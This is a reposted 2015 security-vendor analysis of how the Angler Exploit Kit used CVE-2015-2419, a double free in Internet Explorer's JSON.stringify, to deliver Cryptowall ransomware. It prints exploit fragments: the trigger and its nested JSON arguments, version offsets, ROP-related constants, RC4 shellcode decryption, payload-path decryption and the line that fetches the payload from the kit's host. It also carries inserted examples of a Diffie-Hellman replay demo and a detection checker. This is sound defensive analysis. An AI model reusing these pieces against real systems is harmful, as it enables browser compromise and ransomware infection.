Monday, August 10, 2015

Fireeye. CVE-2015-2419 Internet Explorer Double-Free in Angler EK

TL;DR
  • CVE-2015-2419 patched in July, 2015
  • CVE-2015-2419 is a double free vulnerability in jscript9’s native JSON APIs
  • Angler added new obfuscation to the exploit. The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. 
  • Browser checks - the stub of information is sent only to vulnerable browsers and is protected with XTEA over modified Diffie-Hellman exchange.
  • Landing page obfuscation - HTML + JS
  • Victim browser will POST JSON to attacker server
  • The shellcode is RC4 encrypted
  • Payload - Cryptowall Ransomware
--------------------------------------------------------------------------------------------------------------------------

Original:

CVE-2015-2419 – Internet Explorer Double-Free in Angler EK

The Angler Exploit Kit (EK) recently added support for an Internet Explorer (IE) vulnerability (CVE-2015-2419) that was patched in July 2015. Quickly exploiting recently patched vulnerabilities is standard for Angler EK authors, but the target has been Adobe Flash Player since the second half of 2014. The exploitation of CVE-2015-2419 marks the second departure from Flash exploits for Angler (the first being the inclusion of CVE-2015-1671 in Silverlight). This may be the result of Adobe’s recent exploit mitigations in Flash Player that prevent attackers from using Vector (and similar) objects to develop their control over corrupted Flash processes. To date, Angler will deliver Flash, IE, and/or Silverlight exploits depending upon the target’s environment.
Angler also added a new obfuscation to its IE exploit. The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. The stub of information is only sent to victims that broadcast vulnerable browsers, and is protected with XTEA over a homebrew Diffie-Hellman.

IE Exploit Delivery Protection using Diffie-Hellman Key Exchange

Angler’s landing page is obfuscated in a mix of HTML and JavaScript (JS). Underneath the first layer of obfuscation, the landing page profiles the environment, selects exploits to launch, and launches them. The IE exploit is further obfuscated, and uses a key-sharing (Diffie-Hellman (D-H)) cryptosystem to tailor each attack to an individual victim’s machine. The crypto implementation uses library code from at least jsbn.js (a BigInteger implementation in JavaScript), and bears similarities to cryptico.js.
The victim’s browser will POST the following JSON to the attacker’s server. The naming follows the usual D-H convention: g is the base, p is the modulus, and A is (g**a_) mod p, where a_ is the victim’s secret exponent and is never transmitted on the wire. The system takes little care over the safety of these values: they are chosen from the cryptographically unsafe Math.random (in a custom and imbalanced way that prefers nibbles 0-9 over a-f), they are small, and no primality tests are performed. Value v is the result of ScriptEngineBuildNumber(), which identifies the build of jscript9.
{"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}
The attacker responds with a base64 encoded version of the following. B is the attacker’s D-H response ((g**b_) mod p, where b_ is the attacker’s secret exponent and is not transmitted). k is an encrypted version of the key used to decrypt b. The attacker generates k by XTEA encrypting a random key with the D-H shared key (s = (A**b_) mod p). The victim XTEA decrypts k, and then uses the result to XTEA decrypt b.

{"B":"194ff891862b55d9f1cf5ce4a10f7f92","k":"GulSjPCeuXPcH%2BvwrHjzew%3D%3D","b":"liTB9J%2FghlAzk%2Bp9Kgbg0Y85WPNx1N0jP8u7qPuXo…"}

b contains the constants for the rest of the exploit (reproduced in its entirety in the appendix). The constants are accessed through a couple of layers of indirection in the exploit, so that anyone performing static analysis of the attack would not have the complete exploit: they would have the code flow, but none of the constants (e.g., "ur0pqm8kx", the password used to decrypt the shellcode, or "stringify", the JSON method name that is called).
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"stringify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl":"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III":"clearInterval","lIlI":"ur0pqm8kx",…}
Furthermore, attempts to replay the exploit files will fail because the D-H secret key will be lost. A new random D-H g, A, and p will be created, and won't match the old attacker’s response. As a result, the decryption of the D-H shared secret s will be wrong, as will the decryption results of k and b, and the exploit will fail. The most obvious ways to observe the attack are to:
1) Break the crypto
2) Break the PRNG
3) “Do it live”
It is unclear why the attacker chose to protect only the constant values in the exploit instead of the entire exploit. The decision seems like an unnecessary complication.
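The exchange described above, as an added example that is not part of the original article or of Angler's code: both sides of the D-H round trip on BigInt (standing in for jsbn.js), followed by a replay of the captured reply against a run that drew a fresh secret, which is why the saved exploit files alone cannot recover s, k or b. The parameters are textbook-small constructed values, far smaller than the 128-bit values in the real capture.

```javascript
// Square-and-multiply modular exponentiation on BigInt (stands in for jsbn.js).
function modPow(base, exp, m) {
  let result = 1n;
  base %= m;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % m;
    base = (base * base) % m;
    exp >>= 1n;
  }
  return result;
}

// Victim side: picks g, p and secret exponent a_, then POSTs {g, A, p, v}.
// Angler draws g, A and p from Math.random with no primality test; the
// values used in demo() below are constructed for this example.
function victimHello(g, p, a_, v) {
  return { g: g.toString(16), A: modPow(g, a_, p).toString(16), p: p.toString(16), v: v };
}

// Attacker side: replies with B = g**b_ mod p and keeps s = A**b_ mod p,
// the shared secret used to XTEA-wrap the key k.
function serverResponse(hello, b_) {
  const g = BigInt('0x' + hello.g), p = BigInt('0x' + hello.p), A = BigInt('0x' + hello.A);
  return { B: modPow(g, b_, p).toString(16), s: modPow(A, b_, p) };
}

// Victim side: derives the same s = B**a_ mod p from the reply.
function victimSecret(resp, p, a_) {
  return modPow(BigInt('0x' + resp.B), a_, p);
}

// One live exchange, then a replay of the captured reply against a run
// that drew a different a_: the replayed s no longer matches, so k and b
// cannot be decrypted and the exploit fails.
function demo() {
  const g = 5n, p = 23n, a_ = 6n, b_ = 15n;          // constructed, textbook-small
  const hello = victimHello(g, p, a_, '17840');
  const resp = serverResponse(hello, b_);
  const sLive = victimSecret(resp, p, a_);
  const sReplay = victimSecret(resp, p, 4n);         // new run, new secret
  return { A: hello.A, B: resp.B, s: resp.s, sLive: sLive, sReplay: sReplay,
           agree: sLive === resp.s, replayMatches: sReplay === resp.s };
}
```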

CVE-2015-2419 Vulnerability Details

CVE-2015-2419 is a double free vulnerability in jscript9’s native JSON APIs that was patched in July with MS15-065. Specifically, the vulnerability exists in the way that JSON.stringify parses deeply nested JSON data, triggered as follows. The attacker’s chosen arguments to JSON.stringify are reproduced in their entirety in the appendix.
Il1I4['prototype'].yc =
    function(a) {
        if (!a.ma(!1)) throw new Error(3);
        a.kb(!1);
        a.ib(!1);
        JSON["stringify"](this.Pc, this.uc);
        a.ob(!1);
        CollectGarbage()
    };

Browser Version Validation

This exploit depends on the version of jscript9.dll. In the decoded JSON response above, we can see the key/value pairs (build number to offset) corresponding to the different versions of jscript9.dll:
"llIlI":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,"17801":4088844,"17840":4088840,"17905":4088840}
We can also confirm the version targeted from the following code section:
try {
    var c = a.D["ScriptEngineMajorVersion"](),
        d = a.D["ScriptEngineMinorVersion"](),
        e = a.D["ScriptEngineBuildVersion"](),
        b = c == 11 && d == 0 && e <= 17905;  // jscript9 11.0.x, build 17905 or earlier
} catch (f) {}
if (!b) throw new Error(-1, window["ScriptEngineBuildVersion"] ? '' + window["ScriptEngineBuildVersion"]() : '');
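A detection-side use of the two facts above, as an added example that is not from the article or from Angler: a checker that flags a POST body with exactly the {g, A, p, v} shape of the victim's first request and tells apart a v that is one of the jscript9 builds in the exploit's own offset table (a victim the landing page would serve the stub to) from any other build. The log lines are constructed; the first body is the article's sample.

```javascript
// Builds present in the exploit's "llIlI" build -> offset table (from the article).
const TARGETED_BUILDS = new Set([
  '17416', '17496', '17631', '17640', '17689', '17728', '17801', '17840', '17905',
]);

// g, A and p are lowercase hex; the captured sample uses 32 digits, the
// bound here is loosened because Angler's values are random-length-agnostic.
const HEX_VALUE = /^[0-9a-f]{8,64}$/;

// Classify one request body. Returns:
//   'no-match'        not the Angler hello shape
//   'hello-targeted'  shape matches and v is a build the exploit targets
//   'hello-other'     shape matches but v is not in the table (profiled, not served)
function classifyBody(body) {
  let obj;
  try { obj = JSON.parse(body); } catch (e) { return 'no-match'; }
  if (obj === null || typeof obj !== 'object') return 'no-match';
  if (Object.keys(obj).sort().join(',') !== 'A,g,p,v') return 'no-match';
  const hexOk = [obj.g, obj.A, obj.p].every(x => typeof x === 'string' && HEX_VALUE.test(x));
  if (!hexOk) return 'no-match';
  if (typeof obj.v !== 'string' || !/^\d{4,5}$/.test(obj.v)) return 'no-match';
  return TARGETED_BUILDS.has(obj.v) ? 'hello-targeted' : 'hello-other';
}

// Scan "METHOD URL BODY" lines and return the ones that look like the hello.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /^POST (\S+) (.*)$/.exec(line);
    if (!m) continue;
    const verdict = classifyBody(m[2]);
    if (verdict !== 'no-match') hits.push({ url: m[1], verdict: verdict });
  }
  return hits;
}

// Constructed sample log; line 1 carries the article's captured body, line 2
// the same body with a build outside the table, the rest are unrelated traffic.
const SAMPLE_LOG = [
  'POST /landing.html {"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"17840"}',
  'POST /landing.html {"g":"78ab123a5d20fda81a9420c241a79f4f","A":"268e38c96cf54350d45537fc97c7d526","p":"3a5d2e4d0b5a2d2a6b7e2d4e3a8e3c5d","v":"18000"}',
  'POST /api/login {"user":"alice","pass":"x"}',
  'GET /index.html -',
];
```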

Shellcode Decryption Stage

The shellcode is present inside the IE exploit deobfuscated page as RC4 encrypted and base64 encoded. The key to decrypt the shellcode is also fetched from the above decoded JSON response. In our case, the decryption key is: ur0pqm8kx.
The decryption subroutine is given in Appendix II.

Payload Stage

This latest IE exploit is being used to download the Cryptowall ransomware similar to other variants of Angler Exploit Kit observed in the past few months. The payload is downloaded encrypted over the network. The URL to download the payload is fetched as shown below:
url = "http://" + window["location"]["host"] + "/" + base64_decode(a);
Here, a is fetched from the above decoded JSON response. In our case, it is xexec.
xexec() is a custom function which uses a key on the exploit kit landing page to decrypt the path from where the payload has to be fetched.
    String['prototype']['xexec'] = function() {
        return decryption_routine(encrypted_path);  // the routine in Appendix I
    };
encrypted_path is present on the exploit kit landing page.
encrypted_path = 'F1om1GGamPpL2dyVZZs0U9vmNWGZmPEJVbw8Rcy95wymVmWJGZwZVYlZVN9Rhl03lCGSnZibzahZ1duzU14Td2WcUbWPXT0VBLVmsFpW53mbWauYWenJ9Y0mZlFVlVFM0XPV3ThBJPO1I  G 0 Z      tp M 2';
Using the decryption routine mentioned in Appendix I, this decrypts to the following base64 encoded data:
decrypted_path = ZmF0aGVyLm1odG1sP2ZpcmU9ZW8wJmNvbG9yPVRENm5RJmZlZGVyYWw9ZVVwd3hzSCZhbnl0aGluZz1iLTUmc2V0PUd4TW1VbXBWYWsmb3JnYW5pemF0aW9uPVZ1MVBhV0lFTFlOX3JPMGI2Z0pt
This base64 decodes to: "father.mhtml?fire=eo0&color=TD6nQ&federal=eUpwxsH&anything=b-5&set=GxMmUmpVak&organization=Vu1PaWIELYN_rO0b6gJm"
This is the path from which the payload is served.
The payload fetched from the above path is encrypted. It will be decrypted by the shellcode using the XTEA algorithm. The XTEA key used is present in the deobfuscated HTML page. In our case, it is: Du9JOBgkbfzGvmFF.

Appendix I

Decryption routine to fetch the payload path (a columnar transposition). The key is present on the exploit kit landing page and is not reproduced here. On the landing page the routine is built with new Function(...) and the two method names are supplied through obfuscated variables p and i; they are assumed below to be "push" and "indexOf".
window["osSnUV"] = function(text) {
    var cryptKey = key,                 // key: supplied by the landing page
        rawArray = cryptKey.split(''),
        sortArray = cryptKey.split(''),
        keyArray = [];
    sortArray.sort();
    var keySize = sortArray.length;
    // Column order: position in the raw key of each sorted key character
    // (originally keyArray[p](rawArray[i](...)), assumed push/indexOf).
    for (var i = 0; i < keySize; i++) {
        keyArray.push(rawArray.indexOf(sortArray[i]));
    }
    // Pad the text to a multiple of the key size.
    var k = keySize - text.length % keySize;
    for (var l = 0; l < k; l++) { text += ' '; }
    var endStr = '', j, line, newLine;
    // Reorder each keySize-wide block by the computed column order.
    for (i = 0; i < text.length; i += keySize) {
        line = text.substr(i, keySize).split('');
        newLine = '';
        for (j = 0; j < keySize; j++) { newLine += line[keyArray[j]]; }
        endStr = endStr + newLine;
    }
    endStr = endStr.replace(/\s/g, '');  // drop the padding
    return endStr;
};

Appendix II

RC4 decryption routine to fetch the shellcode (encrypted_shellcode is the base64-decoded ciphertext as a binary string):
function DecryptionRoutine(key, encrypted_shellcode) {
    var d = [], e = 0, f, h, decrypted_shellcode = '';
    // Key-scheduling algorithm: initialise and permute the 256-entry state.
    for (h = 0; h < 256; h++) {
        d[h] = h;
    }
    for (h = 0; h < 256; h++) {
        e = (e + d[h] + key.charCodeAt(h % key.length)) % 256;
        f = d[h];
        d[h] = d[e];
        d[e] = f;
    }
    // Pseudo-random generation: XOR each input byte with the keystream byte.
    for (var k = e = h = 0; k < encrypted_shellcode.length; k++) {
        h = (h + 1) % 256;
        e = (e + d[h]) % 256;
        f = d[h];
        d[h] = d[e];
        d[e] = f;
        decrypted_shellcode += String.fromCharCode(encrypted_shellcode.charCodeAt(k) ^ d[(d[h] + d[e]) % 256]);
    }
    return decrypted_shellcode;
}

Appendix III

Contents of the b constant:
{"ll":"length","l":"charCodeAt","I":"fromCharCode","Il":"floor","IlI":"random","lI":"str
ingify","lII":"location","II":"host","llI":"number","lll":"ScriptEngineBuildVersion","lIl"
:"ScriptEngineMajorVersion","IIl":"ScriptEngineMinorVersion","Ill":"setInterval","III
":"clearInterval","lIlI":"ur0pqm8kx","IlII":"http://","lllI":"/","lIIl":"u","IlIl":"x","llll":"xexec","Illl":"EAX","lIII":"ECX","IIIl":"EDI","IllI":"ESP",
"IIlI":"XCHG EAX,ESP","IIll":"MOV [ECX+0C],EAX","llIl":"CALL [EAX+4C]","llII":"MOV EDI,[EAX+90]","IIII":"a","lIll":"kernel32.dll","lIlll":"virtualprotect","IIIlI":11,"lIIll":0,"l
llll":17905,"lIllI":500,"llIIl":16,"IlIII":0,"IIIll":1,"IIlII":2,"lIlII":3,"IllIl":4,"lllIl":5,
"IIlll":8,"lIlIl":9,"lIIIl":10,"IllII":11,"lIIlI":12,"IlIll":16,"IIIIl":24,"IlIlI":100,"IIIII":1,
"llIlI":2,"lllII":2147483647,"llIll":4294967295,"IIllI":255,"llIII":256,"lIIII":65535,"IIlIl":167
76960,"IlIIl":16777215,"llllI":4294967040,"IlllIl":4294901760,"Illll":4278190080,"IlllI":65280,"l
lllIl":16711680,"lllIlI":19,"llIIII":4096,"IIIIIl":4294963200,"IIlllI":4095,"llIIlI":14598366,
"IIllIl":48,"llIIll":32,"IIIllI":15352,"llIlll":85,"lIIIII":4096,"IllllI":400,"lIIlII":311296000,
"IIIlIl":61440,"llllII":24,"IIIIll":32,"IlIlIl":17239,"lllllI":15,"IllIll":256,"llIllI":76,
"lllIll":144,"lIlIIl":17416,"IlIIll":65536,"IIlIll":100000,"lIlllI":28,"IIlIlI":60,"lIlIII":44,
"IIIlll":28,"IllIII":128,"lllIIl":20,"lIIIll":12,"lIlIlI":16,"IIlIIl":4,"IlIIIl":2,"lIllll":110,
"IIIlII":64,"IllIlI":-1,"lIIIIl":0,"IllIlII":1,"lIIlll":2,"IlIlll":3,"IIlIII":4,"lIllIl":5,"IIllll"
:7,"IIIIII":9,"lIlIll":10,"IlllII":11,"lIllII":12,"Illlll":-2146823286,"lIIIlI":[148,195],"lIIlIl":[137,65,12,195],"IIllII":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,
163058,170761,258290,166489,245298,172955,82542],"IlIIII":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,
180980,226276,179716,320389,175621,307381,792144,183476],"IIIIlI":48,"IIIlIlI":57,"lllIII":65,"IllIIl"
:90,"IlIlII":97,"llllll":122,"IlIllI":16640,"llIlIl":23040,"IlIIlI":4259840,"lIIIIlI":5898240,"llIIIl":
1090519040,"llIIIII":1509949440,"IlIIIlI":32,"IIIlllI":8192,"lllllII":2097152,"IIIllll":536870912,"llIlII":{"17416":4080636,"17496":4080636,"17631":4084748,"17640":4084748,"17689":4080652,"17728":4088844,
"17801":4088844,"17840":4088840,"17905":4088840

Appendix IV

Attacker’s chosen arguments to JSON.stringify to exercise CVE-2015-2419:
Pc = {"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":{"a0":"8HEQ36D4","a1":"7UI7T5FN","a2":"RFM8ORW8","a3":"G50CEWBI","a4":"BL30110U","a5":"AWE8A46R","a6":
"058MT5M1","a7":"QNG7RWBF","a8":"FBQL54XA","a9":"574180FM","a10":"6YCTSRH0","a11":"N0AJ34YX","a12":
"AO7CY3D4","a13":"T5XHR4I0","a14":"784508S8","a15":"4TLC3Q4L","a16":"U7A102Q4","a17":"3466F3UR",
"a18":"356Q7028","a19":"8136URQ8"},"a1":"75C4SKMN","a2":"4LD2OP8P","a3":"UI55N7Y4","a4":"J10L02PV",
"a5":"PEK6K2W7","a6":"U5C1L0YL","a7":"K2YWU745","a8":"J4725E35","a9":"OF1WR0HJ","a10":"505TBO78",
"a11":"W48VSPHX","a12":"X83O3FW0","a13":"U68L8DNA","a14":"187V522Y","a15":"37N768W4","a16":"V66R2D77",
"a17":"85QG6W2E","a18":"81JF5PF7","a19":"7B75IS0S"},"a1":"KBG32EST","a2":"2VN32W7B","a3":"4KT5JVBS",
"a4":"EDPUH4AO","a5":"3A430Q13","a6":"2I5D2250","a7":"41OTHIHR","a8":"CWP0EVCJ","a9":"HLYOGE5X",
"a10":"B3AIE208","a11":"L6AFDY71","a12":"5846CMKV","a13":"3S5DVV2T","a14":"7K5GFF8C","a15":"8YP7WBS2"
,"a16":"5X4EP78P","a17":"88574V1B","a18":"DJ7E8H06","a19":"VG7VN4HY"},"a1":"7P0RT015","a2":"IQPV6IKK",
"a3":"2131VW84","a4":"Y81VNW8D","a5":"TUH60UNR","a6":"52S3R10G","a7":"8J37MCEV","a8":"0737UXB3","a9"
:"6W4HEW6L","a10":"2C182X5P","a11":"K2CJ5VIK","a12":"C5LQLKDA","a13":"L1600HY7","a14":"U0MRETE5","a15"
:"1654VHP0","a16":"1K500GJV","a17":"MI20FAM5","a18":"8V4252VN","a19":"34NQB53F"},"a1":"R88W7ICS","a2"
:"VKC0041R","a3":"I28APIDN","a4":"F7FI27O2","a5":"0N8F1K5S","a6":"L811MVQO","a7":"34DAN88P","a8":
"U0885VRN","a9":"68MPG5T2","a10":"BP55YBYF","a11":"TQT3BWD6","a12":"Y51M3LHU","a13":"FB4P602U","a14"
:"J1N2KO31","a15":"THM817A4","a16":"E4J5A6MH","a17":"L4748S67","a18":"0FELJF2W","a19":"7220PJ14"},
"a1":"4GV2J5RI","a2":"RVA6S111","a3":"X1N0RG08","a4":"EH8013F5","a5":"0BA3XJQT","a6":"H2HX3IJ8",
"a7":"2HC268X4","a8":"015L1E33","a9":"ELO6IGC5","a10":"70KTQ6HM","a11":"1M6IX20K","a12":"X64LGJKK",
"a13":"LBX0KLU7","a14":"5Y8O5731","a15":"6QPRW517","a16":"B1C4PIJ8","a17":"6OS8GCER","a18":"1665C783"
,"a19":"0T08F051"},"a1":"L6U0I741","a2":"UC82L302","a3":"3WYW46B4","a4":"KY1U5C7B","a5":"O3IX8D40",
"a6":"332Q0M74","a7":"7G78UVO7","a8":"6RFVUK6J","a9":"RUCN6WD5","a10":"VLCI7Y3Y","a11":"N04O0IC8",
"a12":"UJGIQ8PG","a13":"IQ3CM3HA","a14":"PD8X1412","a15":"475LEQ6N","a16":"4P57I841","a17":
"0U3F5AS8","a18":"57F7OPCG","a19":"16B8JB47"},"a1":"15LTQ001","a2":"1KHWV333","a3":"2JD25FM5","a4"
:"0BYDYLPW","a5":"NIIV0JT2","a6":"JDL3RW02","a7":"QR3BG505","a8":"MY755QR4","a9":"EXFVX4HK","a10"
:"HP3C3671","a11":"8DC42C1H","a12":"33XW2482","a13":"275B431C","a14":"DQBOT0OX","a15":"VPEC8AK4"
,"a16":"7P8E7VCI","a17":"DVDDFV3J","a18":"U22T484L","a19":"722C31R2"}
uc = function (a, b) {
        return b
    }

Acknowledgements

We would like to thank Aakash Jain for his contributions to this blog.